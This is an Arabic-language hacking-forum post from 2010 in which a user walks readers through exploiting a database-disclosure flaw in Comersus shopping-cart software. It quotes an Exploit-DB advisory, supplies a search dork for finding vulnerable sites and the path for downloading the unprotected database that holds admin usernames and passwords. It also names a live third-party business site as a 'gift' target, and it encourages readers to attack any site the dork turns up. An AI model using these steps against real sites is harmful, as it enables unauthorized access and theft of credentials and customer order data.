يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الهكــر العــام ~ General Hacking Section .:: ] > Hackers Showoff
تحديث الصفحة مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...
التسجيل التعليمات التقويم مشاركات اليوم البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 03-30-2010, 03:59 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 
 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road
Talking مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...

السلام عليكم ورحمه الله وبركاته ...


كيفكم ياحلوين اكيد بخير ، << دوم يارب ..

قبل لا ادخل في الموضوع ياريت [ الادارة تفتح قســم خاص بشروحات الثغرات عشان اشرح لكم ] ...



المهم ندخل في صلب الموضوع . ما ابي اطول عليـــكم ..


بسم الله الرحمن الرحيــم ..

اولا هذا موقع الثغره .. للي مايعرف الموقع تبع الثغرات .. :d

www.exploit-db.com

طبعــا موقع >>:

www.MilW0rM.com

^_^ مغلق له 8 شهــور تقريبــأ ....

خلوكم على هذا افضل ..>>:

www.exploit-db.com


نكمل الشرح ..

هذي الثغره الي تخليك تحمل الملف تبع الموقع وفيه معلومات الادمن خخخخخ

http://www.exploit-db.com/exploits/11931

وبشرحهــا لكم ..


الثغره .:

اقتباس
# Title: Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
# EDB-ID: 11931
# CVE-ID: ()
# OSVDB-ID: ()
# Author: indoushka
# Published: 2010-03-29
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?

================================================== ======================================
| # Title : Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
| # Author : indoushka
| # Home : www.iqs3cur1ty.com
| # Bug : Database Disclosure
====================== Exploit By indoushka =================================
# Exploit :


1- http://127.0.0.1/Comersus/database/comersus.mdb

# Brief Description:

By default, comersus.mdb isn't password-protected, and contains the following sensitive information:
- order information (buyer's address, phone, order status, tracking #, obs, etc)
- settings (encryption password, admin email, company information, etc)
- shipments
- etc

Enough to cause damage for the business if any of that information is obtained.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------


اولا .: الدورك ..:

inurl:Asp - comersus7F

واتحداك تحصل الدورك في الثغرة خخخخخخخخخخخخخخخخ

طيب نجي للإستغلال .. مكتوب في الثغره .:

http://127.0.0.1/Comersus/database/comersus.mdb

هذا الاستغلال .. خـطا .. انا اشوف ، انه خـطا ..

وهذا الصحيح ..

http://www.Dr.NaNo.com/comersus7F/database/comersus.mdb


ركزو معي ..:

اكتبو بعد رابط الموقع هذا المسار بس ..:

comersus7F/database/comersus.mdb

وراح يجيك ملف حمله وبتحصل فيه اليوزر والباسورد ههههههههه لوووول


وهذا موقع هدية مني لكم ... :D

كود PHP:
http://www.totalhealthantiageingclinic.com.au/comersus7F/database/comersus.mdb 
################################


الي مافهم ...: < راح افهمــه

رح خذ [ الدورك ] الي فوق ..

وبتطلع لك مواقع بالهبل .. مثل شعر قروشــة .. هههههههههههههههههه

بعدين اختر اي موقع ..:

وامسح الكلام كله. وخل الرابــط كذا

www.xxxx.com

بس واكتب وراه على طول هذا المسار ..:

comersus7F/database/comersus.mdb


وخلاص انتهى ياشنب ...بجيك تحميل حمل وافتحه وبتحصل الباسورد واليورز .. وبس ..:

:D


أنتهى الشششششششششششششششششرح :00001793[1]:


لووووووووووووووول :icon555:


الشــــرح اهـــــداء الى ..:

فريق كلاشنكوف .

والهيكل الارزق .

ودوم البطل .

وسنايبر غزة .

وقروشـة .

ومين كمان ؟ نسيت الباقين والله ..

وإهداء لكل العنــــــــاكـــــب ... < عشان ماحد يزعل ..


تحياتي لكم اخواكم ./

Dr.NaNo


lu Dr>NaNo F juhg plg hglgt jfu hgl,ru >> ,Yojvr >>>>> g,,,,,,,,g D>>>

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
دورك الألف الموقع المصابه|مع شرح بسيط.. DR.THMoORY SQL قواعد البيانات 41 11-14-2010 10:33 PM
- كيف أجمع معلومات حول الموقع ؟(تعال افهمك تعال) KaLa$nikoV قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 14 02-26-2010 05:03 PM
افضل موقع لمرفة معلومات عن الموقع + ايميل صاحب الموقع + سيرفرات الموقع + صاحب الموقع MATRIX ALGERIA قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 3 01-05-2010 11:42 PM
[شرح] : إزالة رابط الموقع الشخصي ، من الملف الشخصي للعضو ! skfn.net xman2 قســم تطويــر المــــواقع 0 09-02-2009 01:30 AM
تعال أدخل شوف معاي الموقع الأجنبي AZOZ جـــ'ابات العناكــ'ب 3 08-08-2009 03:57 AM


الساعة الآن 06:49 AM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0